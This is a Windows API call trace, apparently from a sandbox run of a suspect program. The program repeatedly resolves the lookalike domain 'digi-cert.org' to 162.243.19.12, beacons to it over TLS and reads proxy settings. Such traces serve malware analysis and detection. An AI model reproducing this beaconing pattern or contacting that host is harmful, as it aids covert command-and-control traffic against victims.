	[0546.697] select (in: nfds=0, readfds=0x233e48fece8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48fece8, writefds=0x0, exceptfds=0x0) returned 1
	[0546.697] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0546.699] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0546.701] shutdown (s=0x7cc, how=2) returned 0
	[0546.706] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0546.706] closesocket (s=0x7cc) returned 0
	[0546.710] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0546.711] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0546.711] WSAConnect (in: s=0x7cc, name=0x233e4900480*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0546.830] closesocket (s=0x9bc) returned 0
	[0546.831] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48fd428, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4900d08, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4900d08, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0546.833] FreeContextBuffer (in: pvContextBuffer=0x233fc688420 | out: pvContextBuffer=0x233fc688420) returned 0x0
	[0546.833] send (in: s=0x7cc, buf=0x233e4900dd8*, len=333, flags=0 | out: buf=0x233e4900dd8*) returned 333
	[0546.833] recv (in: s=0x7cc, buf=0x233e4900dd8, len=5, flags=0 | out: buf=0x233e4900dd8*) returned 5
	[0546.940] recv (in: s=0x7cc, buf=0x233e4900ddd, len=49, flags=0 | out: buf=0x233e4900ddd*) returned 49
	[0546.940] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48fd428, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4901018, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4901038, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4901038, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0546.940] recv (in: s=0x7cc, buf=0x233e4901128, len=5, flags=0 | out: buf=0x233e4901128*) returned 5
	[0546.940] recv (in: s=0x7cc, buf=0x233e490114d, len=1, flags=0 | out: buf=0x233e490114d*) returned 1
	[0546.940] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48fd428, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4901220, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4901240, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4901240, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0546.941] recv (in: s=0x7cc, buf=0x233e4901330, len=5, flags=0 | out: buf=0x233e4901330*) returned 5
	[0546.941] recv (in: s=0x7cc, buf=0x233e4901355, len=48, flags=0 | out: buf=0x233e4901355*) returned 48
	[0546.941] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48fd428, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4901458, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4901478, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4901478, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0546.943] FreeContextBuffer (in: pvContextBuffer=0x233e399c640 | out: pvContextBuffer=0x233e399c640) returned 0x0
	[0546.943] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e49015c0 | out: pBuffer=0x233e49015c0) returned 0x0
	[0546.943] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4901618 | out: pBuffer=0x233e4901618) returned 0x0
	[0546.944] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4901680 | out: pBuffer=0x233e4901680) returned 0x0
	[0546.944] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0546.945] CertDuplicateStore (hCertStore=0x233fc683760) returned 0x233fc683760
	[0546.945] CertEnumCertificatesInStore (hCertStore=0x233fc683760, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0546.945] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0546.945] CertEnumCertificatesInStore (hCertStore=0x233fc683760, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0546.946] CertCloseStore (hCertStore=0x233fc683760, dwFlags=0x0) returned 1
	[0546.946] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0546.948] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6834f0
	[0546.948] CertAddCRLLinkToStore (in: hCertStore=0x233fc6834f0, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0546.948] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc6834f0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0546.950] CertDuplicateCertificateChain (pChainContext=0x233fc6fee10) returned 0x233fc6fee10
	[0546.952] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0546.953] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0546.954] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0546.954] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0546.955] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0546.955] SetLastError (dwErrCode=0x0) 
	[0546.955] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fee10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0546.955] CertFreeCertificateChain (pChainContext=0x233fc6fee10) 
	[0546.955] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0546.956] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4904288, MessageSeqNo=0x0 | out: pMessage=0x233e4904288) returned 0x0
	[0546.956] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fcf0
	[0546.956] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e4901548*), (len=0xd5, buf=0x233e4904090*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fcf0*=((len=0x3b, buf=0x233e4901548*), (len=0xd5, buf=0x233e4904090*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0546.956] CoTaskMemFree (pv=0x233fc64fcf0) 
	[0546.956] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0546.956] recv (in: s=0x7cc, buf=0x233e4904430, len=5, flags=0 | out: buf=0x233e4904430*) returned 5
	[0547.438] recv (in: s=0x7cc, buf=0x233e4904455, len=1488, flags=0 | out: buf=0x233e4904455*) returned 1488
	[0547.438] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4904b38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4904b38, pfQOP=0x0) returned 0x0
	[0547.439] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0547.439] SetEvent (hEvent=0x6b4) returned 1
	[0547.470] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0567.475] CloseHandle (hObject=0x25c) returned 1
	[0567.854] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0567.854] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0567.854] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0567.855] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0567.856] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0567.856] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0567.856] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0567.857] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0567.858] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0567.858] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0567.858] GetCurrentProcess () returned 0xffffffffffffffff
	[0567.858] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0567.859] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68bb60
	[0567.859] WinHttpSetTimeouts (hInternet=0x233fc68bb60, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0567.859] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0567.883] SetEvent (hEvent=0x6b4) returned 1
	[0567.883] select (in: nfds=0, readfds=0x233e490c530, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e490c530, writefds=0x0, exceptfds=0x0) returned 1
	[0567.884] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0567.886] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0567.888] shutdown (s=0x7cc, how=2) returned 0
	[0567.901] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0567.901] closesocket (s=0x7cc) returned 0
	[0567.902] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0567.903] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0567.904] CoTaskMemAlloc (cb=0xf) returned 0x233fc715220
	[0567.904] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0x350199bba0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x350199bb98 | out: ppResult=0x350199bb98*=0x233fc6617b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x233fc714d40*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0567.909] CoTaskMemFree (pv=0x233fc715220) 
	[0567.909] CoTaskMemFree (pv=0x0) 
	[0567.909] FreeAddrInfoW (pAddrInfo=0x233fc6617b0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x233fc714d40*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0567.910] WSAConnect (in: s=0x7cc, name=0x233e490e068*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0568.022] closesocket (s=0x9bc) returned 0
	[0568.023] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e490ac70, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e490e8f0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e490e8f0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0568.025] FreeContextBuffer (in: pvContextBuffer=0x233fc687b80 | out: pvContextBuffer=0x233fc687b80) returned 0x0
	[0568.025] send (in: s=0x7cc, buf=0x233e490e9c0*, len=333, flags=0 | out: buf=0x233e490e9c0*) returned 333
	[0568.025] recv (in: s=0x7cc, buf=0x233e490e9c0, len=5, flags=0 | out: buf=0x233e490e9c0*) returned 5
	[0568.131] recv (in: s=0x7cc, buf=0x233e490e9c5, len=49, flags=0 | out: buf=0x233e490e9c5*) returned 49
	[0568.132] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e490ac70, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e490ec00, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e490ec20, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e490ec20, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0568.132] recv (in: s=0x7cc, buf=0x233e490ed10, len=5, flags=0 | out: buf=0x233e490ed10*) returned 5
	[0568.132] recv (in: s=0x7cc, buf=0x233e490ed35, len=1, flags=0 | out: buf=0x233e490ed35*) returned 1
	[0568.132] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e490ac70, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e490ee08, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e490ee28, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e490ee28, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0568.133] recv (in: s=0x7cc, buf=0x233e490ef18, len=5, flags=0 | out: buf=0x233e490ef18*) returned 5
	[0568.133] recv (in: s=0x7cc, buf=0x233e490ef3d, len=48, flags=0 | out: buf=0x233e490ef3d*) returned 48
	[0568.133] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e490ac70, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e490f040, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e490f060, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e490f060, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0568.135] FreeContextBuffer (in: pvContextBuffer=0x233e399cac0 | out: pvContextBuffer=0x233e399cac0) returned 0x0
	[0568.135] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e490f1a8 | out: pBuffer=0x233e490f1a8) returned 0x0
	[0568.135] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e490f200 | out: pBuffer=0x233e490f200) returned 0x0
	[0568.136] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e490f268 | out: pBuffer=0x233e490f268) returned 0x0
	[0568.137] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0568.137] CertDuplicateStore (hCertStore=0x233fc6835c0) returned 0x233fc6835c0
	[0568.137] CertEnumCertificatesInStore (hCertStore=0x233fc6835c0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0568.137] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0568.137] CertEnumCertificatesInStore (hCertStore=0x233fc6835c0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0568.137] CertCloseStore (hCertStore=0x233fc6835c0, dwFlags=0x0) returned 1
	[0568.137] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0568.139] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683010
	[0568.139] CertAddCRLLinkToStore (in: hCertStore=0x233fc683010, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0568.139] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683010, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0568.141] CertDuplicateCertificateChain (pChainContext=0x233fc6fe990) returned 0x233fc6fe990
	[0568.142] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0568.143] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0568.144] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0568.144] CertFreeCertificateChain (pChainContext=0x233fc6fe990) 
	[0568.144] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fe990, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0568.144] SetLastError (dwErrCode=0x0) 
	[0568.144] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fe990, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0568.144] CertFreeCertificateChain (pChainContext=0x233fc6fe990) 
	[0568.145] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0568.145] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4911e70, MessageSeqNo=0x0 | out: pMessage=0x233e4911e70) returned 0x0
	[0568.145] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fb40
	[0568.145] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e490f130*), (len=0xd5, buf=0x233e4911c78*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fb40*=((len=0x3b, buf=0x233e490f130*), (len=0xd5, buf=0x233e4911c78*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0568.145] CoTaskMemFree (pv=0x233fc64fb40) 
	[0568.145] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0568.145] recv (in: s=0x7cc, buf=0x233e4912018, len=5, flags=0 | out: buf=0x233e4912018*) returned 5
	[0568.663] recv (in: s=0x7cc, buf=0x233e491203d, len=1488, flags=0 | out: buf=0x233e491203d*) returned 1488
	[0568.663] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4912720, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4912720, pfQOP=0x0) returned 0x0
	[0568.663] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0568.663] SetEvent (hEvent=0x6b4) returned 1
	[0568.692] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0574.697] CloseHandle (hObject=0x25c) returned 1
	[0575.229] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0575.230] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x9c8) returned 0x0
	[0575.230] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0575.230] RegNotifyChangeKeyValue (hKey=0x9c8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0575.232] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0575.233] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0575.233] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0575.234] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa80) returned 0x0
	[0575.235] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa5c
	[0575.235] RegNotifyChangeKeyValue (hKey=0xa80, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa5c, fAsynchronous=1) returned 0x0
	[0575.235] GetCurrentProcess () returned 0xffffffffffffffff
	[0575.235] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa70) returned 1
	[0575.236] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689740
	[0575.236] WinHttpSetTimeouts (hInternet=0x233fc689740, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0575.236] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0575.260] SetEvent (hEvent=0x6b4) returned 1
	[0575.260] select (in: nfds=0, readfds=0x233e4919e38, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4919e38, writefds=0x0, exceptfds=0x0) returned 1
	[0575.261] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0575.263] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0575.266] shutdown (s=0x7cc, how=2) returned 0
	[0575.270] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0575.270] closesocket (s=0x7cc) returned 0
	[0575.272] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0575.273] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9bc
	[0575.273] WSAConnect (in: s=0x7cc, name=0x233e491b5d0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0575.384] closesocket (s=0x9bc) returned 0
	[0575.386] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4918578, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e491be58, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e491be58, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0575.389] FreeContextBuffer (in: pvContextBuffer=0x233fc688140 | out: pvContextBuffer=0x233fc688140) returned 0x0
	[0575.389] send (in: s=0x7cc, buf=0x233e491bf28*, len=333, flags=0 | out: buf=0x233e491bf28*) returned 333
	[0575.389] recv (in: s=0x7cc, buf=0x233e491bf28, len=5, flags=0 | out: buf=0x233e491bf28*) returned 5
	[0575.495] recv (in: s=0x7cc, buf=0x233e491bf2d, len=49, flags=0 | out: buf=0x233e491bf2d*) returned 49
	[0575.495] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4918578, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e491c168, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e491c188, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e491c188, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0575.495] recv (in: s=0x7cc, buf=0x233e491c278, len=5, flags=0 | out: buf=0x233e491c278*) returned 5
	[0575.495] recv (in: s=0x7cc, buf=0x233e491c29d, len=1, flags=0 | out: buf=0x233e491c29d*) returned 1
	[0575.495] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4918578, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e491c370, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e491c390, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e491c390, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0575.496] recv (in: s=0x7cc, buf=0x233e491c480, len=5, flags=0 | out: buf=0x233e491c480*) returned 5
	[0575.496] recv (in: s=0x7cc, buf=0x233e491c4a5, len=48, flags=0 | out: buf=0x233e491c4a5*) returned 48
	[0575.496] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4918578, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e491c5a8, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e491c5c8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e491c5c8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0575.500] FreeContextBuffer (in: pvContextBuffer=0x233e399bda0 | out: pvContextBuffer=0x233e399bda0) returned 0x0
	[0575.500] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e491c710 | out: pBuffer=0x233e491c710) returned 0x0
	[0575.500] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e491c768 | out: pBuffer=0x233e491c768) returned 0x0
	[0575.501] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e491c7d0 | out: pBuffer=0x233e491c7d0) returned 0x0
	[0575.501] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0575.502] CertDuplicateStore (hCertStore=0x233fc682a60) returned 0x233fc682a60
	[0575.502] CertEnumCertificatesInStore (hCertStore=0x233fc682a60, pPrevCertContext=0x0) returned 0x233fc67f430
	[0575.502] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0575.502] CertEnumCertificatesInStore (hCertStore=0x233fc682a60, pPrevCertContext=0x233fc67f430) returned 0x0
	[0575.503] CertCloseStore (hCertStore=0x233fc682a60, dwFlags=0x0) returned 1
	[0575.504] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
